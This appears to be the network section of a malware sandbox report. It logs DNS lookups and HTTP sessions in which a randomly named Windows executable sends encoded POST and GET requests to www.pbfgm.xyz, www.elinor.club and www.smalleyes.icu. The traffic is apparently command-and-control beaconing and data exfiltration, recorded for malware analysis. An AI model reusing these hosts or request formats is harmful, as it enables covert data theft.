                                                                                            Dec 19, 2024 08:41:08.816263914 CET53512261.1.1.1192.168.2.4
                                                                                            Dec 19, 2024 08:41:16.897948027 CET5694253192.168.2.41.1.1.1
                                                                                            Dec 19, 2024 08:41:17.338335991 CET53569421.1.1.1192.168.2.4
                                                                                            Dec 19, 2024 08:41:31.847620964 CET5387153192.168.2.41.1.1.1
                                                                                            Dec 19, 2024 08:41:32.810414076 CET53538711.1.1.1192.168.2.4
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Dec 19, 2024 08:40:51.060406923 CET192.168.2.41.1.1.10xcb4bStandard query (0)www.pbfgm.xyzA (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 08:41:08.145827055 CET192.168.2.41.1.1.10x1b01Standard query (0)www.phdcoach.proA (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 08:41:16.897948027 CET192.168.2.41.1.1.10x55a3Standard query (0)www.elinor.clubA (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 08:41:31.847620964 CET192.168.2.41.1.1.10x4265Standard query (0)www.smalleyes.icuA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Dec 19, 2024 08:40:51.366868973 CET1.1.1.1192.168.2.40xcb4bNo error (0)www.pbfgm.xyz104.21.86.111A (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 08:40:51.366868973 CET1.1.1.1192.168.2.40xcb4bNo error (0)www.pbfgm.xyz172.67.218.146A (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 08:41:08.816263914 CET1.1.1.1192.168.2.40x1b01Name error (3)www.phdcoach.prononenoneA (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 08:41:17.338335991 CET1.1.1.1192.168.2.40x55a3No error (0)www.elinor.club194.58.112.174A (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 08:41:32.810414076 CET1.1.1.1192.168.2.40x4265No error (0)www.smalleyes.icu134.122.191.187A (IP address)IN (0x0001)false
                                                                                            • www.pbfgm.xyz
                                                                                            • www.elinor.club
                                                                                            • www.smalleyes.icu
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449763104.21.86.111806016C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 19, 2024 08:40:51.510485888 CET539OUTGET /fjd6/?Ir=beVfoldUF3/aok0FdWpvJC8HGsWBcAhapzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK2FUvh8SZisD6hpiODREZagit+S+U5/mb9Z4=&M8Gl=KPotmx2p0n HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Host: www.pbfgm.xyz
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                            Dec 19, 2024 08:40:53.098361969 CET1236INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 19 Dec 2024 07:40:52 GMT
                                                                                            Content-Type: text/html
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lPshYalhrtD9Y10kN9TS1MuLLXFbXNssi%2Bzcc2WGAEMAB8aplepjKd7Y%2BPmmZzy3ufoTrcjYhx1n0tEx9%2FLH3kLBFMi9CrejcvL4S8uOaj65j6HuXRYsd%2F5rzb%2BRU5L7"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8f45bf3ba8c8ef9d-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1793&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=119&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                            Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                            Data Ascii: 228<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome frien
                                                                                            Dec 19, 2024 08:40:53.098515034 CET94INData Raw: 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20
                                                                                            Data Ascii: dly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.449825194.58.112.174806016C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 19, 2024 08:41:17.476660013 CET803OUTPOST /1ne4/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Host: www.elinor.club
                                                                                            Origin: http://www.elinor.club
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Connection: close
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Referer: http://www.elinor.club/1ne4/
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                            Data Raw: 49 72 3d 61 6b 33 62 41 61 73 75 7a 51 54 78 45 6c 6f 4e 72 75 42 61 4e 34 45 4c 5a 66 67 7a 54 37 64 35 67 46 39 47 31 79 49 51 38 65 5a 49 43 4b 58 41 76 68 61 4e 31 44 4d 56 4c 65 35 57 4b 56 51 56 49 49 6f 63 5a 53 4e 57 30 56 41 76 72 32 2b 6e 35 6a 6c 70 78 42 5a 72 6e 71 2b 77 2b 54 4c 6c 31 45 43 79 4a 4b 57 5a 2b 35 30 49 47 43 61 72 58 45 39 44 37 36 37 45 4d 55 37 47 52 58 32 74 42 33 48 6b 4b 51 55 50 65 48 45 64 49 38 43 57 6b 56 4e 63 37 4d 4e 77 70 73 5a 49 45 45 49 58 4f 4e 47 4b 57 68 6b 75 62 4e 53 69 52 47 78 58 57 2f 35 4a 73 55 6e 6f 47 62 77 54 2b 4a 64 4b 42 77 3d 3d
                                                                                            Data Ascii: Ir=ak3bAasuzQTxEloNruBaN4ELZfgzT7d5gF9G1yIQ8eZICKXAvhaN1DMVLe5WKVQVIIocZSNW0VAvr2+n5jlpxBZrnq+w+TLl1ECyJKWZ+50IGCarXE9D767EMU7GRX2tB3HkKQUPeHEdI8CWkVNc7MNwpsZIEEIXONGKWhkubNSiRGxXW/5JsUnoGbwT+JdKBw==
                                                                                            Dec 19, 2024 08:41:18.788994074 CET341INHTTP/1.1 302 Moved Temporarily
                                                                                            Server: nginx
                                                                                            Date: Thu, 19 Dec 2024 07:41:18 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 154
                                                                                            Connection: close
                                                                                            Location: http://elinor.club/1ne4/
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.449831194.58.112.174806016C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 19, 2024 08:41:20.147219896 CET823OUTPOST /1ne4/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Host: www.elinor.club
                                                                                            Origin: http://www.elinor.club
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Connection: close
                                                                                            Content-Length: 219
                                                                                            Cache-Control: no-cache
                                                                                            Referer: http://www.elinor.club/1ne4/
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                            Data Raw: 49 72 3d 61 6b 33 62 41 61 73 75 7a 51 54 78 46 45 59 4e 70 4a 56 61 4b 59 45 49 57 2f 67 7a 64 62 64 48 67 46 35 47 31 7a 4d 36 38 4e 39 49 43 72 6e 41 75 67 61 4e 79 44 4d 56 66 4f 35 58 56 6c 51 4f 49 49 6b 75 5a 53 68 57 30 56 45 76 72 79 36 6e 35 55 52 6d 33 52 5a 70 38 61 2b 79 36 54 4c 6c 31 45 43 79 4a 4b 71 7a 2b 39 67 49 46 7a 71 72 47 56 39 41 67 61 37 4c 4e 55 37 47 61 33 32 70 42 33 48 38 4b 55 4d 70 65 45 73 64 49 35 6d 57 6e 42 52 64 73 38 4d 37 33 63 59 73 48 55 68 66 48 4d 6a 30 66 78 67 43 56 49 32 39 5a 67 38 4e 48 4f 59 65 2b 55 44 62 62 63 35 6e 7a 4b 67 44 61 79 52 6e 43 53 55 2f 56 63 7a 48 39 44 54 4e 34 65 4a 31 59 76 51 3d
                                                                                            Data Ascii: Ir=ak3bAasuzQTxFEYNpJVaKYEIW/gzdbdHgF5G1zM68N9ICrnAugaNyDMVfO5XVlQOIIkuZShW0VEvry6n5URm3RZp8a+y6TLl1ECyJKqz+9gIFzqrGV9Aga7LNU7Ga32pB3H8KUMpeEsdI5mWnBRds8M73cYsHUhfHMj0fxgCVI29Zg8NHOYe+UDbbc5nzKgDayRnCSU/VczH9DTN4eJ1YvQ=
                                                                                            Dec 19, 2024 08:41:21.459768057 CET341INHTTP/1.1 302 Moved Temporarily
                                                                                            Server: nginx
                                                                                            Date: Thu, 19 Dec 2024 07:41:21 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 154
                                                                                            Connection: close
                                                                                            Location: http://elinor.club/1ne4/
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.449836194.58.112.174806016C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 19, 2024 08:41:22.853152990 CET10905OUTPOST /1ne4/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Host: www.elinor.club
                                                                                            Origin: http://www.elinor.club
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Connection: close
                                                                                            Content-Length: 10299
                                                                                            Cache-Control: no-cache
                                                                                            Referer: http://www.elinor.club/1ne4/
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                            Data Raw: 49 72 3d 61 6b 33 62 41 61 73 75 7a 51 54 78 46 45 59 4e 70 4a 56 61 4b 59 45 49 57 2f 67 7a 64 62 64 48 67 46 35 47 31 7a 4d 36 38 4e 31 49 44 5a 66 41 76 44 79 4e 7a 44 4d 56 44 2b 35 4b 56 6c 52 57 49 4c 56 6c 5a 53 64 73 30 58 4d 76 72 58 75 6e 2f 68 39 6d 2b 52 5a 70 6a 71 2b 2f 2b 54 4c 77 31 45 79 2b 4a 4c 47 7a 2b 39 67 49 46 78 69 72 47 45 39 41 69 61 37 45 4d 55 37 61 52 58 32 42 42 33 76 73 4b 55 59 66 66 30 4d 64 4a 5a 32 57 33 69 35 64 75 63 4d 35 32 63 59 30 48 55 39 51 48 4d 2b 46 66 79 38 73 56 4f 4b 39 61 56 73 58 59 75 6f 2f 74 30 72 48 50 4d 35 79 2f 59 46 45 62 42 4a 2b 54 6e 63 46 4f 74 32 73 7a 55 69 79 71 4d 70 72 42 35 64 72 46 59 53 6c 71 48 65 4d 38 32 7a 42 49 67 33 4d 73 4d 41 73 4e 31 63 67 53 37 48 73 32 35 36 55 4f 36 68 75 33 2f 4c 52 71 78 55 75 50 42 42 6f 42 57 64 65 2f 69 75 65 51 69 39 4f 4c 6b 38 58 69 38 51 43 45 49 32 37 5a 57 48 41 50 46 36 48 4d 77 70 56 49 41 36 6c 66 66 79 2b 52 70 71 51 4c 39 51 4f 63 45 49 77 32 71 47 4f 36 4f 38 55 75 4b 74 66 48 78 4d [TRUNCATED]
                                                                                            Data Ascii: Ir=ak3bAasuzQTxFEYNpJVaKYEIW/gzdbdHgF5G1zM68N1IDZfAvDyNzDMVD+5KVlRWILVlZSds0XMvrXun/h9m+RZpjq+/+TLw1Ey+JLGz+9gIFxirGE9Aia7EMU7aRX2BB3vsKUYff0MdJZ2W3i5ducM52cY0HU9QHM+Ffy8sVOK9aVsXYuo/t0rHPM5y/YFEbBJ+TncFOt2szUiyqMprB5drFYSlqHeM82zBIg3MsMAsN1cgS7Hs256UO6hu3/LRqxUuPBBoBWde/iueQi9OLk8Xi8QCEI27ZWHAPF6HMwpVIA6lffy+RpqQL9QOcEIw2qGO6O8UuKtfHxMQeI05kv0CVLB6CbDpAminx4on/sI0MlheijoBz/bqbXkewTkhybHb0Y0+eqt2qITXnGrAaJJgePopWzRvXzlNLSdyDI4Ispc6aFohaJCzL2BKUbnlhpxhQNN4LtsSxA8PZ/r8AujsxIo7ilF3v0AnuLzX8GnQXp1mYTCiUxRSfEFT9S/n8BjmY/nf5bXoovdsm+kfVLqY/Yj2QoDm4nD8Cr0BNoo7LrWKnKw8ghoeeNQIG8ySn7ZcLkodxaPkd12Q6MzVJ3w8TncIsq0oL6c54688hjoMjNCxxtJQ7rniZPc5hTV9KgGQnW5OWeuR8bDlKlR1w0W+n/o4eJiHSyRbLiJy2qjxPQNvrj6LRbB2vAa/0L7qWOGa5stcBIc8t1kAu4i6KELAosmSQ4xp36MeCEX0U9JPklX02dy6DZRIf9CIwr89xyYRDXiLKLQwlVabZxbCheNbJsifU8h5c6j+LD3DE8yrFxzzxvzhquyMrWEB/Hwer/Nt9Ya/9vA6EI0Rf8yssooMaq6zTJFmnhaCNR8RLxmG/jtmgYkAtKHYNgtFaNm/+0OTh6RpcLrMnQTvslfjBnrTq31VclXjgtXOo5KtXML9L1kpzupsis6L//BZJ8M5++JZq4Rynfi5vxcJ13oRfGaqf4YUMPjE3CR2LzqF+wVNGRzKa [TRUNCATED]
                                                                                            Dec 19, 2024 08:41:24.143435001 CET341INHTTP/1.1 302 Moved Temporarily
                                                                                            Server: nginx
                                                                                            Date: Thu, 19 Dec 2024 07:41:23 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 154
                                                                                            Connection: close
                                                                                            Location: http://elinor.club/1ne4/
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.449845194.58.112.174806016C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 19, 2024 08:41:25.516135931 CET541OUTGET /1ne4/?Ir=Xmf7DtAQ/BnKPHUir9F/DJAWe/lobbRTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5jUfoqKY7Fz8p0/9FqW//8AiMTO0G3RJpL4=&M8Gl=KPotmx2p0n HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Host: www.elinor.club
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                            Dec 19, 2024 08:41:26.834894896 CET481INHTTP/1.1 302 Moved Temporarily
                                                                                            Server: nginx
                                                                                            Date: Thu, 19 Dec 2024 07:41:26 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 154
                                                                                            Connection: close
                                                                                            Location: http://elinor.club/1ne4/?Ir=Xmf7DtAQ/BnKPHUir9F/DJAWe/lobbRTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5jUfoqKY7Fz8p0/9FqW//8AiMTO0G3RJpL4=&M8Gl=KPotmx2p0n
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.449863134.122.191.187806016C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 19, 2024 08:41:32.949417114 CET809OUTPOST /s6zh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Host: www.smalleyes.icu
                                                                                            Origin: http://www.smalleyes.icu
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Connection: close
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Referer: http://www.smalleyes.icu/s6zh/
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                            Data Raw: 49 72 3d 36 6e 6e 37 58 38 4c 48 4d 66 5a 56 49 57 2f 53 6b 75 4d 37 69 36 50 6d 46 64 57 31 4e 33 35 41 6a 50 4e 71 63 61 53 66 61 46 57 38 53 33 68 72 53 64 75 53 76 78 2f 45 54 6e 74 55 71 53 62 35 4d 43 42 72 70 34 78 66 6c 56 62 70 4e 35 76 47 36 44 46 56 4f 2f 39 4c 45 44 6d 46 74 37 55 4f 35 6b 34 36 41 4f 71 4f 2b 49 46 68 4e 69 53 6d 6b 35 6b 49 45 51 58 4c 38 52 65 6d 75 4b 43 30 52 6e 4b 6c 57 2f 6a 6c 63 69 6b 35 47 72 78 59 74 45 5a 34 50 56 78 45 6a 62 7a 4c 6c 50 43 71 75 55 6d 49 51 50 57 53 6a 73 37 76 68 49 71 4a 32 70 53 33 79 33 6b 46 37 55 76 4b 69 31 48 70 76 67 3d 3d
                                                                                            Data Ascii: Ir=6nn7X8LHMfZVIW/SkuM7i6PmFdW1N35AjPNqcaSfaFW8S3hrSduSvx/ETntUqSb5MCBrp4xflVbpN5vG6DFVO/9LEDmFt7UO5k46AOqO+IFhNiSmk5kIEQXL8RemuKC0RnKlW/jlcik5GrxYtEZ4PVxEjbzLlPCquUmIQPWSjs7vhIqJ2pS3y3kF7UvKi1Hpvg==


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.449869134.122.191.187806016C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 19, 2024 08:41:35.608900070 CET829OUTPOST /s6zh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Host: www.smalleyes.icu
                                                                                            Origin: http://www.smalleyes.icu
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Connection: close
                                                                                            Content-Length: 219
                                                                                            Cache-Control: no-cache
                                                                                            Referer: http://www.smalleyes.icu/s6zh/
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                            Data Raw: 49 72 3d 36 6e 6e 37 58 38 4c 48 4d 66 5a 56 4f 31 6e 53 6d 4a 67 37 7a 61 50 70 4b 39 57 31 44 58 35 45 6a 4f 78 71 63 5a 66 61 61 33 43 38 53 57 52 72 54 63 75 53 73 78 2f 45 63 48 74 52 6c 79 62 32 4d 43 46 4e 70 35 39 66 6c 56 2f 70 4e 34 66 47 36 77 64 4b 55 50 39 4a 43 44 6d 48 6a 62 55 4f 35 6b 34 36 41 4f 75 67 2b 4f 74 68 4e 52 4b 6d 32 73 51 4c 48 51 58 49 72 68 65 6d 71 4b 43 77 52 6e 4b 48 57 36 66 4c 63 68 4d 35 47 72 42 59 74 32 68 37 47 56 77 50 75 37 79 4b 31 2f 6d 75 69 57 62 2b 54 63 7a 33 6f 64 57 58 6b 4f 6e 54 6e 59 7a 67 67 33 41 32 6d 54 6d 2b 76 32 36 67 30 6e 4d 6e 2b 47 2b 63 45 55 4a 34 54 33 2f 69 42 61 71 5a 71 6b 55 3d
                                                                                            Data Ascii: Ir=6nn7X8LHMfZVO1nSmJg7zaPpK9W1DX5EjOxqcZfaa3C8SWRrTcuSsx/EcHtRlyb2MCFNp59flV/pN4fG6wdKUP9JCDmHjbUO5k46AOug+OthNRKm2sQLHQXIrhemqKCwRnKHW6fLchM5GrBYt2h7GVwPu7yK1/muiWb+Tcz3odWXkOnTnYzgg3A2mTm+v26g0nMn+G+cEUJ4T3/iBaqZqkU=


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.449875134.122.191.187806016C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 19, 2024 08:41:38.284279108 CET10911OUTPOST /s6zh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Host: www.smalleyes.icu
                                                                                            Origin: http://www.smalleyes.icu
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Connection: close
                                                                                            Content-Length: 10299
                                                                                            Cache-Control: no-cache
                                                                                            Referer: http://www.smalleyes.icu/s6zh/
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
